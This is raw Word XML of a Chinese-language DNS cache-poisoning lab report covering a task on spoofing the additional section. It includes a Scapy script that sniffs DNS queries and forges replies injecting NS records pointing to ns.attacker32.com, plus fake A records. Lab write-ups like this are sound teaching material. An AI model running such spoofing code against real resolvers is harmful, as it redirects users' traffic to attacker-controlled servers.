        <w:spacing w:before="0" w:beforeAutospacing="0" w:after="0" w:afterAutospacing="0"/>
        <w:ind w:left="360"/>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="2E5DA251" w14:textId="7163FC55" w:rsidR="008C54F9" w:rsidRDefault="008C54F9" w:rsidP="008C54F9">
      <w:pPr>
        <w:pStyle w:val="a6"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:spacing w:before="0" w:beforeAutospacing="0" w:after="0" w:afterAutospacing="0"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">在local </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>dns</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> server中情况缓存</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5F8FB496" w14:textId="1807F4C1" w:rsidR="008C54F9" w:rsidRDefault="008C54F9" w:rsidP="008C54F9">
      <w:pPr>
        <w:pStyle w:val="a6"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:spacing w:before="0" w:beforeAutospacing="0" w:after="0" w:afterAutospacing="0"/>
      </w:pPr>
      <w:r>
        <w:t>在User主机中查询www.example.com来完成攻击(因为查询example.com才会受到攻击)，结果没问题。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="04454B3C" w14:textId="323A19CE" w:rsidR="008C54F9" w:rsidRDefault="002118C8" w:rsidP="008C54F9">
      <w:pPr>
        <w:pStyle w:val="a6"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:spacing w:before="0" w:beforeAutospacing="0" w:after="0" w:afterAutospacing="0"/>
      </w:pPr>
      <w:r>
        <w:t>之后查询www.google.com，发现并未使用ns.attacker32.com作为其DNS。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1A7D46DB" w14:textId="1216496A" w:rsidR="002118C8" w:rsidRDefault="002118C8" w:rsidP="005D6E66">
      <w:pPr>
        <w:pStyle w:val="a6"/>
        <w:spacing w:before="0" w:beforeAutospacing="0" w:after="0" w:afterAutospacing="0"/>
        <w:ind w:left="360"/>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="002118C8">
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="2531398D" wp14:editId="561EAAD8">
            <wp:extent cx="5274310" cy="31324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4899" w14:textId="11D4EC84" w:rsidR="002118C8" w:rsidRDefault="002118C8" w:rsidP="001958AA">
      <w:pPr>
        <w:pStyle w:val="a6"/>
        <w:spacing w:before="0" w:beforeAutospacing="0" w:after="0" w:afterAutospacing="0"/>
        <w:ind w:firstLine="360"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">查询local </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>dns</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> server DNS缓存之后结果如下(并没有使用</w:t>
      </w:r>
      <w:r w:rsidR="001958AA">
        <w:t>ns.</w:t>
      </w:r>
      <w:r w:rsidR="001958AA">
        <w:tab/>
      </w:r>
      <w:r w:rsidR="001958AA">
        <w:t>attacker32.com</w:t>
      </w:r>
      <w:r w:rsidR="005D6E66">
        <w:t>):</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="30823542" w14:textId="6FE0F35A" w:rsidR="005D6E66" w:rsidRDefault="005D6E66" w:rsidP="001958AA">
      <w:pPr>
        <w:pStyle w:val="a6"/>
        <w:spacing w:before="0" w:beforeAutospacing="0" w:after="0" w:afterAutospacing="0"/>
        <w:ind w:firstLine="360"/>
      </w:pPr>
      <w:r w:rsidRPr="005D6E66">
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="23E4BEA8" wp14:editId="2BFB33D9">
            <wp:extent cx="5274310" cy="22059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BC3E" w14:textId="33A30023" w:rsidR="002118C8" w:rsidRDefault="002118C8" w:rsidP="002118C8">
      <w:pPr>
        <w:pStyle w:val="a6"/>
        <w:spacing w:before="0" w:beforeAutospacing="0" w:after="0" w:afterAutospacing="0"/>
      </w:pPr>
      <w:r>
        <w:tab/>
      </w:r>
      <w:r w:rsidR="005D6E66">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>这里</w:t>
      </w:r>
      <w:r w:rsidR="005D6E66">
        <w:t>可以查找一下原因</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0F491CE7" w14:textId="09926F5D" w:rsidR="007F2763" w:rsidRPr="00515D81" w:rsidRDefault="00515D81" w:rsidP="00515D81">
      <w:pPr>
        <w:pStyle w:val="a6"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="17"/>
        </w:numPr>
        <w:spacing w:before="0" w:beforeAutospacing="0" w:after="0" w:afterAutospacing="0"/>
        <w:rPr>
          <w:rFonts w:ascii="黑体" w:eastAsia="黑体" w:hAnsi="黑体"/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00515D81">
        <w:rPr>
          <w:rFonts w:ascii="黑体" w:eastAsia="黑体" w:hAnsi="黑体"/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
        <w:t>Task5: Spoofing Records in the Additional Section</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2E8D9B7A" w14:textId="41647D1C" w:rsidR="00515D81" w:rsidRDefault="00515D81" w:rsidP="00515D81">
      <w:pPr>
        <w:pStyle w:val="a6"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="20"/>
        </w:numPr>
        <w:spacing w:before="0" w:beforeAutospacing="0" w:after="0" w:afterAutospacing="0"/>
      </w:pPr>
      <w:r>
        <w:t>在Attacker上创建文件attack-4.py，内容如下(相比于attack-3做了修改):</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1C5F7C13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515D8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#!/</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="00515D8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usr/bin/env python3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2792E9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from </w:t>
      </w:r>
      <w:proofErr w:type="spellStart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scapy.all</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd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import *  </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="073BBC5B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import sys  </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="19B59C05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NS_NAME = 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"example.com"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2F1EB1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def </w:t>
      </w:r>
      <w:proofErr w:type="spellStart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spoof_dns</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd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(pkt):  </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="15B952F5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5D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(DNS in pkt and NS_NAME in </w:t>
      </w:r>
      <w:proofErr w:type="gramStart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pkt[</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd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DNS].qd.qname.decode(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'utf-8'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)):  </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="01B02EA4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print(</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:proofErr w:type="gramEnd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pkt.sprintf</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd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"{DNS: %</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/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IP.src</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/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 --&gt; %</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/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IP.dst</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/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%: %DNS.id%}"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5EF9EE71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ip = </w:t>
      </w:r>
      <w:proofErr w:type="gramStart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IP(</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd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src=pkt[IP].dst, dst=pkt[IP].src) # Create an IP object  </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="353D4CFB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udp = </w:t>
      </w:r>
      <w:proofErr w:type="gramStart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UDP(</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd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sport=53, dport=pkt[UDP].sport) # Create a UPD object  </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0BBF0131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Anssec = </w:t>
      </w:r>
      <w:proofErr w:type="gramStart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DNSRR(</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd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rrname=pkt[DNS].qd.qname, type=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ttl=259200, rdata=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"1.2.3.4"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# Create an aswer record  </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="399D7DA2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Nssec1 = </w:t>
      </w:r>
      <w:proofErr w:type="gramStart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DNSRR(</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd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rrname=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"example.com"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type=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"NS"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rdata=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"ns.attacker32.com"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ttl=259200)  </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="69E9789B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Nssec2 = </w:t>
      </w:r>
      <w:proofErr w:type="gramStart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DNSRR(</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd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rrname=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"google.com"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type=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"NS"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rdata=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"ns.attacker32.com"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ttl=259200)  </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3CC4BA76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Addsec1 = </w:t>
      </w:r>
      <w:proofErr w:type="gramStart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DNSRR(</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd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rrname=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"ns.attacker32.com"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type=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rdata=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"1.1.1.1"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ttl=259200)  </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="623206C6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Addsec2 = </w:t>
      </w:r>
      <w:proofErr w:type="gramStart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DNSRR(</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd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rrname=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"ns.example.net"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type=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rdata=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"2.2.2.2"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ttl=259200)  </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="343AC5D4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Addsec3 = </w:t>
      </w:r>
      <w:proofErr w:type="gramStart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DNSRR(</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd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rrname=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"www.facebook.com"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type=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rdata=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"3.3.3.3"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ttl=259200)  </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4DC41F12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dns = </w:t>
      </w:r>
      <w:proofErr w:type="gramStart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DNS(</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd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id=pkt[DNS].id, qd=pkt[DNS].qd, aa=1,rd=0,qr=1,qdcount=1,ancount=1,nscount=2,an=Anssec,ns=Nssec1/Nssec2,ar=Addsec1/Addsec2/Addsec3) # Create a DNS object  </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="77E8D332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spoofpkt = ip/udp/dns # Assemble the spoofed DNS packet  </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="39FB2751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send(</w:t>
      </w:r>
      <w:proofErr w:type="spellStart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spoofpkt</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd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3201588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myFilter = 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"udp and dst port 53 and src host 10.9.0.53"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 Set the filter  </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="30E6EAB5" w14:textId="77777777" w:rsidR="00515D81" w:rsidRPr="00515D81" w:rsidRDefault="00515D81" w:rsidP="00515D8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pkt=</w:t>
      </w:r>
      <w:proofErr w:type="gramStart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sniff(</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/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iface=</w:t>
      </w:r>
      <w:r w:rsidRPr="00515D8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'br-968e65729223'</w:t>
      </w:r>
      <w:r w:rsidRPr="00515D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filter=myFilter, prn=spoof_dns)  </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0D52EE36" w14:textId="3FAE7252" w:rsidR="00515D81" w:rsidRDefault="00515D81" w:rsidP="00515D81">
      <w:pPr>
        <w:pStyle w:val="a6"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="22"/>
        </w:numPr>
        <w:spacing w:before="0" w:beforeAutospacing="0" w:after="0" w:afterAutospacing="0"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">在local </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>dns</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> server中清空缓存</w:t>
      </w:r>
      <w:r>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="226493B3" w14:textId="21C2B547" w:rsidR="00515D81" w:rsidRDefault="00515D81" w:rsidP="00515D81">
      <w:pPr>
        <w:pStyle w:val="a6"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="22"/>
        </w:numPr>
        <w:spacing w:before="0" w:beforeAutospacing="0" w:after="0" w:afterAutospacing="0"/>
      </w:pPr>
      <w:r>
        <w:t>在User主机中查询www.example.com来完成攻击(因为查询example.com才会受到攻击)，结果没问题。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="45B13305" w14:textId="30552857" w:rsidR="00515D81" w:rsidRDefault="00515D81" w:rsidP="00515D81">
      <w:pPr>
        <w:pStyle w:val="a6"/>
        <w:spacing w:before="0" w:beforeAutospacing="0" w:after="0" w:afterAutospacing="0"/>
        <w:ind w:left="420"/>
      </w:pPr>
      <w:r w:rsidRPr="00515D81">
        <w:lastRenderedPageBreak/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="72E2DD67" wp14:editId="3D59927A">
            <wp:extent cx="5274310" cy="30759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5929" w14:textId="719C2741" w:rsidR="00515D81" w:rsidRDefault="00515D81" w:rsidP="00515D81">
      <w:pPr>
        <w:pStyle w:val="a6"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="22"/>
        </w:numPr>
        <w:spacing w:before="0" w:beforeAutospacing="0" w:after="0" w:afterAutospacing="0"/>
      </w:pPr>
      <w:r>
        <w:t>查看</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>locsal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server的DNS cache，结果如下:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0E9ADABB" w14:textId="3579C822" w:rsidR="00515D81" w:rsidRDefault="00515D81" w:rsidP="00515D81">
      <w:pPr>
        <w:pStyle w:val="a6"/>
        <w:spacing w:before="0" w:beforeAutospacing="0" w:after="0" w:afterAutospacing="0"/>
        <w:ind w:left="360"/>
      </w:pPr>
      <w:r w:rsidRPr="00515D81">
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="5D7E5B08" wp14:editId="339D52AF">
            <wp:extent cx="5274310" cy="12503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A1E9" w14:textId="4E973905" w:rsidR="00515D81" w:rsidRPr="00515D81" w:rsidRDefault="00515D81" w:rsidP="00515D81">
      <w:pPr>
        <w:pStyle w:val="a6"/>
        <w:spacing w:before="0" w:beforeAutospacing="0" w:after="0" w:afterAutospacing="0"/>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:tab/>
      </w:r>
      <w:r>
        <w:t>对这个结果该作何解释？</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>感兴趣可以自己查找资料。</w:t>
      </w:r>
    </w:p>
    <w:sectPr w:rsidR="00515D81" w:rsidRPr="00515D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CC0"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="5D446220"/>
    <w:lvl w:ilvl="0" w:tplc="107CC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EE4CF4"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="CD18B628"/>
    <w:lvl w:ilvl="0" w:tplc="9E1E6420">
      <w:start w:val="1"/>
      <w:numFmt w:val="decimal"/>
      <w:lvlText w:val="%1."/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="360" w:hanging="360"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsia="宋体" w:hAnsiTheme="minorHAns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7B2C02"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="036E0E5A"/>
    <w:lvl w:ilvl="0" w:tplc="DAF0A24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DA1CF1"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="153CF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8F7B7A"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="A22CD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CA43E3"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="28E6887A"/>
    <w:lvl w:ilvl="0" w:tplc="D7EE6DB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C52777"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="8AB852BA"/>
    <w:lvl w:ilvl="0" w:tplc="24A4304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8654C7"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="54A844F0"/>
    <w:lvl w:ilvl="0" w:tplc="3E3CF5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8E1D1E"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="99D29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244048"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="498AC8B8"/>
    <w:lvl w:ilvl="0" w:tplc="AB36C5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306251C8"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="06D4699A"/>
    <w:lvl w:ilvl="0" w:tplc="2292A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9D5DF1"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="5F20B63C"/>
    <w:lvl w:ilvl="0" w:tplc="CC40275A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BA4387"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="B8981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FB5FF8"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="E3E45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735BEE"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="05D2B2A6"/>
    <w:lvl w:ilvl="0" w:tplc="7B9A4BDA">
      <w:start w:val="3"/>
      <w:numFmt w:val="decimal"/>
      <w:lvlText w:val="%1."/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="360" w:hanging="360"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsia="宋体" w:hAnsiTheme="minorHAns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4983DA5"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="0094AC16"/>
    <w:lvl w:ilvl="0" w:tplc="9C086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C4947A4"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="612684B6"/>
    <w:lvl w:ilvl="0" w:tplc="326843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DB74A0"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="04523984"/>
    <w:lvl w:ilvl="0" w:tplc="F564A1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43E7CFE"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="4504FF06"/>
    <w:lvl w:ilvl="0" w:tplc="5CE2AF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47813EC"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="E54296A8"/>
    <w:lvl w:ilvl="0" w:tplc="0A526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F270A89"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="BE9E6782"/>
    <w:lvl w:ilvl="0" w:tplc="3566159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A64D62"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="ADE00AE2"/>
    <w:lvl w:ilvl="0" w:tplc="C88E6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07876122">
    <w:abstractNumId w:val="7"/>
  </w:num>
  <w:num w:numId="2" w16cid:durableId="1868330415">
    <w:abstractNumId w:val="10"/>
  </w:num>
  <w:num w:numId="3" w16cid:durableId="711998031">
    <w:abstractNumId w:val="20"/>
  </w:num>
  <w:num w:numId="4" w16cid:durableId="729504607">
    <w:abstractNumId w:val="16"/>
  </w:num>
  <w:num w:numId="5" w16cid:durableId="1486049320">
    <w:abstractNumId w:val="15"/>
  </w:num>
  <w:num w:numId="6" w16cid:durableId="1460033551">
    <w:abstractNumId w:val="1"/>
  </w:num>
  <w:num w:numId="7" w16cid:durableId="1613433231">
    <w:abstractNumId w:val="13"/>
  </w:num>
  <w:num w:numId="8" w16cid:durableId="1866401765">
    <w:abstractNumId w:val="5"/>
  </w:num>
  <w:num w:numId="9" w16cid:durableId="824316243">
    <w:abstractNumId w:val="9"/>
  </w:num>
  <w:num w:numId="10" w16cid:durableId="1330016038">
    <w:abstractNumId w:val="21"/>
  </w:num>
  <w:num w:numId="11" w16cid:durableId="1791508023">
    <w:abstractNumId w:val="19"/>
  </w:num>
  <w:num w:numId="12" w16cid:durableId="2040278268">
    <w:abstractNumId w:val="3"/>
  </w:num>
  <w:num w:numId="13" w16cid:durableId="574701580">
    <w:abstractNumId w:val="14"/>
  </w:num>
  <w:num w:numId="14" w16cid:durableId="1776438323">
    <w:abstractNumId w:val="17"/>
  </w:num>
  <w:num w:numId="15" w16cid:durableId="2061586820">
    <w:abstractNumId w:val="4"/>
  </w:num>
  <w:num w:numId="16" w16cid:durableId="163013699">
    <w:abstractNumId w:val="6"/>
  </w:num>
  <w:num w:numId="17" w16cid:durableId="1977559694">
    <w:abstractNumId w:val="11"/>
  </w:num>
  <w:num w:numId="18" w16cid:durableId="832528483">
    <w:abstractNumId w:val="0"/>
  </w:num>
  <w:num w:numId="19" w16cid:durableId="1628049374">
    <w:abstractNumId w:val="8"/>
  </w:num>
  <w:num w:numId="20" w16cid:durableId="1084573551">
    <w:abstractNumId w:val="18"/>
  </w:num>
  <w:num w:numId="21" w16cid:durableId="843519153">
    <w:abstractNumId w:val="12"/>
  </w:num>
  <w:num w:numId="22" w16cid:durableId="3012302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B15"/>
    <w:rsid w:val="001958AA"/>
    <w:rsid w:val="002118C8"/>
    <w:rsid w:val="002246D1"/>
    <w:rsid w:val="00263ACE"/>
    <w:rsid w:val="0033392D"/>
    <w:rsid w:val="00515D81"/>
    <w:rsid w:val="00546E97"/>
    <w:rsid w:val="005D6E66"/>
    <w:rsid w:val="00667FFE"/>
    <w:rsid w:val="00673D62"/>
    <w:rsid w:val="006F32C3"/>
    <w:rsid w:val="007F2763"/>
    <w:rsid w:val="008C54F9"/>
    <w:rsid w:val="00992160"/>
    <w:rsid w:val="009B36A8"/>
    <w:rsid w:val="00AF4B15"/>
    <w:rsid w:val="00D934B7"/>
    <w:rsid w:val="00E52646"/>
    <w:rsid w:val="00E86A8C"/>
    <w:rsid w:val="00EB2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EFBD3"/>
  <w15:chartTrackingRefBased/>
  <w15:docId w15:val="{D47779F2-66A8-49EF-A882-85BFEE6F8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6A8C"/>
    <w:pPr>
      <w:ind w:firstLineChars="200" w:firstLine="420"/>
    </w:pPr>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="notion-enable-hover">
    <w:name w:val="notion-enable-hover"/>
    <w:basedOn w:val="a0"/>
    <w:rsid w:val="00E86A8C"/>
  </w:style>
  <w:style w:type="character" w:styleId="a4">
    <w:name w:val="Hyperlink"/>
    <w:basedOn w:val="a0"/>
    <w:uiPriority w:val="99"/>
    <w:unhideWhenUsed/>
    <w:rsid w:val="00E86A8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86A8C"/>
    <w:rPr>
      <w:color w:val="605E5C"/>
      <w:shd w:val="clear" w:color="auto" w:fill="E1DFDD"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:customStyle="1" w:styleId="alt">
    <w:name w:val="alt"/>
    <w:basedOn w:val="a"/>
    <w:rsid w:val="003339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33392D"/>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="string">
    <w:name w:val="string"/>
    <w:basedOn w:val="a0"/>
    <w:rsid w:val="0033392D"/>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="keyword">
    <w:name w:val="keyword"/>
    <w:basedOn w:val="a0"/>
    <w:rsid w:val="0033392D"/>
  </w:style>
  <w:style w:type="paragraph" w:styleId="a6">
    <w:name w:val="Normal (Web)"/>
    <w:basedOn w:val="a"/>
    <w:uiPriority w:val="99"/>
    <w:unhideWhenUsed/>
    <w:rsid w:val="003339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xample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hyperlink" Target="http://www.example.com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1168</Words>
  <Characters>6664</Characters>
  <Application>Microsoft Office Word</Application>
  <DocSecurity>0</DocSecurity>
  <Lines>55</Lines>
  <Paragraphs>15</Paragraphs>
  <ScaleCrop>false</ScaleCrop>
  <Company/>
  <LinksUpToDate>false</LinksUpToDate>
  <CharactersWithSpaces>7817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许可</dc:creator>
  <cp:keywords/>
  <dc:description/>
  <cp:lastModifiedBy>李 许可</cp:lastModifiedBy>
  <cp:revision>14</cp:revision>
  <dcterms:created xsi:type="dcterms:W3CDTF">2022-07-13T04:32:00Z</dcterms:created>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2022-07-13T04:58:00Z</dcterms:modified>
</cp:coreProperties>
</file>